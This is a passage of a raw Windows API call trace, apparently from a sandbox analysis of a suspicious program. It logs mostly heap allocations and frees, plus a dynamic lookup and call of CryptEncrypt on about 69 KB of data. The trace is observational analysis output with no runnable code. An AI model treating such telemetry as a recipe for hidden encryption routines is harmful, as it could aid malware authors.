hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d3de0 | out: hHeap=0x25c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.621] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0200.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0200.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9cd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0200.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.624] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0200.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0200.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0200.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6bc0 [0200.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0200.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0200.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0200.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0200.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0200.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0200.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0200.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0200.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0200.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0200.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0200.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0200.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0200.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0200.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.625] CryptEncrypt (in: hKey=0xaa58a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x10dbe, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x10dc0) returned 1 [0200.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0200.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0200.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0200.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0200.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0200.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0200.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0200.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0200.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0200.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0200.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0200.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0200.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0200.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0200.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0200.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0200.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0200.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0200.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0200.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0200.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0200.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0200.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0200.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01e0 | out: hHeap=0x25c0000) returned 1 [0200.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0200.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0200.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0200.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0200.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0200.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0200.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.629] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.630] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.630] CharLowerBuffW (in: lpsz="byte[69056]", cchLength=0xb | out: lpsz="byte[69056]") returned 0xb [0200.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.631] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.634] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 